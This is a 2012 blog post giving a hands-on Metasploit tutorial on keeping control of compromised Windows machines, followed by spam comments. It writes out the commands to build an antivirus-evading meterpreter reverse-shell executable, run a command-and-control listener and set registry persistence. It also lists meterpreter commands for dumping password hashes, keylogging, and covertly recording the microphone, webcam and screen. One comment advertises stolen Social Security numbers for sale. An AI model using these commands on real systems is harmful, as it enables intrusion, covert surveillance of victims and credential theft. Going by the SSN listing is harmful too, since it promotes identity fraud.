Friday, March 30, 2012

Post Exploitation Control

Once you've gained access to a box, there are many options for "post-exploitation" control. Our main goals at that point in the game are:
  • Continued control- You don't want to lose control after a reboot or whatnot.
  • Control flexibility- A control method that allows us to interact with the system however we, gui, etc
  • Facilitate privilege escalation- If we only have user level access, we want a control method that facilitates efforts to gain SYSTEM/root
  • Facilitate pivoting- An easy platform for attacking other systems through our compromised host.
  • Evading detection- We don't want logs/IDS/anti-virus to cause us any issues.

A good control method that meets these goals relatively well, is to use meterpreter, in a persistent fashion.

The rest of the post will be a quick demo on:
  1. Creating a meterpreter payload exe
  2. Setting up a command and control handler
  3. Making the target systems persistent so the machine stays owned
  4. A few useful meterpreter commands.

1) Creating a meterpreter payload exe
First we download metasploit from and install it, I'll use version 4.2. You'll also need the ruby and ruby-gems packages installed.
First order of business is to create a stand alone meterpreter exe that when executed will connect back to a meterpreter listener, which we'll set up later. This is done with the msfpayload utility, and then passed through msfencode to make it harder for IDS and anti-virus to detect. We are going to encode our payload into a known good exe, so I download pslist.exe from sysinternals to use for that. You can play around with other executables, your mileage may vary.
This is the command I use to create my payload (replace the info in quotes). Its detected by about half of the AV vendors... still working on that.
/opt/metasploit-4.2.0/app/msfpayload windows/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="LISTENER PORT" R | /opt/metasploit-4.2.0/app/msfencode -t exe ~/pslist.exe -o /root/payload.exe -e x86/shikata_ga_nai -c 10

This creates our metasploit payload and encodes it with the Shikata ga nai method 10 times, outputting the final product to /root/payload.exe
The payload will connect to our handler (which we will set up in a second) and give us a meterpreter shell on the target.

2) Setting up a command and control handler
Now let's set up a persistent metasploit handler on a machine out on the internet, so our pwned targets have a place to call home to.

Note: If using a previous version of metasploit, you can edit the msfcli script to add in the -J (Execute the selected module as a background job) functionality that we're going to use. Instructions for adding that functionality can be found at:

To start up a listener we use the msfcli command like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost="LISTENER IP" lport="LISTENER PORT" ExitOnSession=false J

And we're ready to accept connections.

When a target executes our payload, we'll see the handler take the connection and start a meterpreter session with it. You can see any established sessions with the command "sessions -l". You can then interact with any session by running "sessions -i (sessionId)".

3) Making the target systems persistent, so the machine stays owned
Connect to a session with "sessions -i (sessionId)". Now you can make the system to automatically reconnect every 5 seconds in the event you lose connection to it, by issuing this command:
run persistence -U -i 5 -p "LISTENER PORT" -r "LISTENER IP"

It converts the payload to a vbs file which it calls from the registry. Now if your victim reboots or moves or you restart your handler, they will just connect back in as soon as they can.

4) A few useful meterpreter commands
Now on to meterpreter commands. There is no way I could list all the usages of Meterpreter, but here's some of the quick ones you'll want to know.
  • getuid- shows the account you are executing under.
  • getsystem- This uses a variety of methods to try to escalate privileges, if you're lucky it'll get you "NT AUTHORITY\SYSTEM".
  • hashdump- Dumps the password hashes, as you'd expect.

These hashes can be cracked or used in a pass-the-hash attack, which we'll probably cover in a future post.

  • getpid- Gets your current process' pid
  • migrate- Moves the meterpreter service, and injects it into another process

Here's an example of migrating over to the LSASS process

Sometimes you're unable to display hashes with hashdump because of process controls that only allow certain processes to access hashes. Simply migrating to another process such as LSASS, can allow you to bypass that control.

More commands:
  • keyscan_start- Start grabbing keystrokes
  • keyscan_dump- View keystrokes
  • record_mic- Record audio from the default microphone
  • webcam_snap- Take a snapshot from the specified webcam
  • screenshot- Grab a screenshot of the users desktop

There's much much more you can do with meterpreter. There are built in commands for network tunnels, and for pivoting attacks on additional systems through the currently owned target, but that probably deserves its own blog entry.


  1. Replies
    1. 7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download Now

      >>>>> Download Full

      7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download LINK

      >>>>> Download Now

      7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download Full

      >>>>> Download LINK fG

  2. Bosch Security Systems has its state-of-the-art demo cum training academy at Bengaluru. This academy aims to bring the highest level of manufacturer training to the industry, to improve product knowledge and competency.

    Oxford Security

  3. Have used AVG antivirus for a couple of years, I'd recommend this solution to everyone.

  4. Visit here and know more about windows shortcut keys. windows shortcut keys This website will help you to understand all the information of windows shortcut keys.

  5. Picking the right package design and style. An excellent principle in corrugated boxes is "Greater is Cheaper ".If you're able to configure your package such that it opens on the littlest proportions and the biggest dimension may be the deepest, this allows for the least volume corrugated to be properly used to create the box.
    cheap custom boxes
    custom boxe for products
    custom boxe usa cheap custom boxe custom boxes with logo
    custom boxe usa
    cheap custom boxe custom boxes cheap custom boxe custom boxes

  6. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.



    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email >

    Telegram > @leadsupplier

    ICQ > 752822040

  7. Nice information, Freelance business consultant who is looking for consulting projects, then kindly register with SolutionBuggy, India's largest business consulting platform dedicated to MSMEs. We act as a bridge between consultants and industries.

  8. SolutionBuggy is India's Largest Manufacturing Platform, connecting MSMEs and consultants. Get Access to Verified MSME Projects and Consultants Across India.

  9. FSSAI Consultants | Fssai License Consultants - SolutionBuggy

  10. 7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download Now

    >>>>> Download Full

    7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download LINK

    >>>>> Download Now

    7 Habits Of Highly Effective Hackers: Post Exploitation Control >>>>> Download Full

    >>>>> Download LINK 2h

  11. Do you want to know about Nikkie De Jager Net Worth, gender, early life, biography, age, and relationship status?